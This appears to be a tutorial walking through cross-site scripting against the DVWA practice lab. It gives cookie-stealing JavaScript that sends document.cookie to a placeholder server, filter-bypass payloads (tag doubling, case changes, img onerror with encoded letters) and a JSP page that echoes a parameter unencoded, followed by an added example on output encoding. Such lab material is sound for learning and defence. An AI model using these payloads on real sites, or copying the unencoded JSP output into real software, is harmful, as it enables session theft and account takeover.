Brief introduction
XSS stands for cross-site scripting. To avoid confusion with the abbreviation for Cascading Style Sheets (CSS), it is abbreviated XSS rather than CSS. XSS is a type of security vulnerability in web applications that allows a malicious web user to embed code into pages served to other users.
Harm of XSS attacks
An XSS attack can be used for:
1. Stealing user accounts of all kinds, such as machine login accounts, online banking accounts and administrator accounts
2. Controlling enterprise data, including reading, tampering with, adding and deleting sensitive enterprise data
3. Stealing important commercial material of an enterprise
4. Illegal funds transfers
5. Forcing the victim to send email
6. Planting malicious code on a website (a drive-by download, "hanging a horse")
7. Controlling the victim's machine to launch attacks on other websites
Reflected XSS
The parameters passed to the page are echoed on the page exactly as received, and the browser's security settings permit the unsafe script to execute.
Low level
Take http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=English and replace the parameter value English with
<script>alert('hack')</script>
Press Enter; the cross-site scripting attack succeeds.
Using XSS to obtain the user's cookie
Since a script tag can load and execute JavaScript code from a remote server, write a cookie.js on your own server.
Writing cookie.js
Using the DOM to generate and submit a form (not recommended):
document.write("<form action='http://server-ip/project/cookie-accepting-interface' name='exploit' method='post' style='display:none'>");
document.write("<input type='hidden' name='data' value='" + document.cookie + "'>");
document.write("</form>");
// console.info('xss-dom: ' + document.cookie);
document.exploit.submit();
Using XMLHttpRequest in JS:
var httpRequest = new XMLHttpRequest(); // step 1: create the request object
httpRequest.open('POST', 'http://ip:port/interface-path', true); // step 2: open the connection
httpRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); // set the request header; for POST this must be done after open() and before send()
// console.info('xss-dom: ' + document.cookie);
/*
 * Handler that runs once the server has responded (registered before send() so no state change is missed)
 */
httpRequest.onreadystatechange = function () { // callback after the request; code to run on success goes here
    if (httpRequest.readyState == 4 && httpRequest.status == 200) { // verify the request completed successfully
        var json = httpRequest.responseText; // the data returned by the server
        // console.log(json);
    }
};
httpRequest.send('data=' + document.cookie); // send the request; the request body goes in send()
This JS code builds a hidden form with a hidden field in the page, fills it with the current cookie, and POSTs it to your interface.
Using cookie.js
Next, insert it wherever there is an XSS vulnerability.
Take http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=English and replace the parameter value English with
<script src="http://server-ip/project-path/cookie.js"></script>
Medium level
The <script> tag is filtered. Starting from the low-level payload, change <script> to <scr<script>ipt> or to <SCRIPT>:
<scr<script>ipt>alert("xss")</script>
<SCRIPT>alert("xss")</SCRIPT>
High level
Any input that contains the letters "script" together is blocked, so the script tag can no longer be used; instead, take the request-sending part out of cookie.js. Loading a nonexistent image triggers the JavaScript onerror event, so the request is written into onerror.
<img SrC=# oneRror=(locatIon.href="http://ip:port/cookieinf?data="+documenT.cookie)>
Pay attention to the inserted code: the upper-case letters together spell "script", so it matches the filter's pattern and is filtered out. In the payload below, the "i" is therefore HTML-encoded as &#x69;:
<img src=# onerror=(locat&#x69;on.href="http://ip:port/cookieinf?data="+document.cookie)>
Stored XSS
The same as reflected XSS, except that the payload is first stored in the database; when the stored data is later displayed, the stored script is executed.
<script>document.write('<img src="http://ip:port/getcookie?cookie='+document.cookie+'" height=0 border=0 />');</script>
Low level
Burp Suite can be used to bypass the length check.
Medium level
1. Double-write bypass: enter <scr<script>ipt>alert(document.cookie)</script>
2. Case bypass: enter <SCRIPT>alert(document.cookie)</SCRIPT>
3. Others, such as imalerc = 3( document.cookie >
High level
<IMG src=1 onerror=alert(document.cookie)>
JSP code vulnerable to XSS
Parameters received by the JSP are output to the page in their original form after server-side processing, and the browser's security settings allow scripts to run (ActiveX controls not marked as safe are enabled).
The code is as follows:
<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>
<%
String path = request.getContextPath();
String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";
%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<base href="<%=basePath%>">
<title>My JSP 'index.jsp' starting page</title>
<meta http-equiv="pragma" content="no-cache">
<meta http-equiv="cache-control" content="no-cache">
<meta http-equiv="expires" content="0">
<meta http-equiv="keywords" content="keyword1,keyword2,keyword3">
<meta http-equiv="description" content="This is my page">
</head>
<body>
<div style="margin: 0 auto">
<%
//Set the request encoding
request.setCharacterEncoding("UTF-8");
//Read the user-supplied value
String tmp = request.getParameter("opr");
//Check whether the input value is empty
if(tmp == null){
out.print("the value is null");
}else{
//Transcode from ISO-8859-1 to UTF-8
String opr = new String(tmp.getBytes("ISO-8859-1"),"utf-8");
/*Output the value passed in directly to the page (no output encoding: this is the XSS sink)*/
out.print(opr);
}
%>
I am the content
</div>
</body>
</html>
At this point, when the JSP parameter opr contains a <script></script> block, the script is output to the page and the browser executes it automatically.
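As an added example, not code from the original post or from DVWA, the following JavaScript models the medium- and high-level filters as this page describes them, next to contextual HTML output encoding, the fix a defender applies instead of blacklisting (the same encoding belongs in front of out.print(opr) in the JSP above). The filter models, encodeForHtml, containsOpeningTag and survivors are my own simplified stand-ins, not DVWA's actual code.

```javascript
// Added example (not from the original post or DVWA): simplified models of the
// blacklist filters described above versus contextual output encoding.

// "Medium level" as described: the literal <script> tag is removed (once, case-sensitively).
function stripScriptOnce(input) {
  return input.replace("<script>", "");
}

// "High level" as described: any input containing the letters "script" is refused.
// Returns null so the caller can reject the request outright.
function rejectIfScript(input) {
  return /script/i.test(input) ? null : input;
}

// The defender's fix: encode for the HTML text context instead of filtering. Every
// character that could open a tag or entity is replaced, so the browser renders text.
function encodeForHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(input).replace(/[&<>"']/g, (c) => map[c]);
}

// Could a browser still parse this output as an opening tag?
function containsOpeningTag(html) {
  return /<[a-z]/i.test(html);
}

// Constructed inputs: the payload strings quoted on this page plus one benign value.
const SAMPLES = [
  "English",
  "<script>alert('hack')</script>",
  '<scr<script>ipt>alert("xss")</script>',
  '<SCRIPT>alert("xss")</SCRIPT>',
  '<img src=# onerror=(location.href="http://ip:port/cookieinf?data="+document.cookie)>',
];

// Returns the sample inputs that would still reach the page as markup after `filter`.
function survivors(filter) {
  return SAMPLES.filter((s) => {
    const out = filter(s);
    return out !== null && containsOpeningTag(out);
  });
}
```

Run with node: survivors(stripScriptOnce) returns three of the page's payloads, survivors(rejectIfScript) returns only the img/onerror one, and survivors(encodeForHtml) returns none.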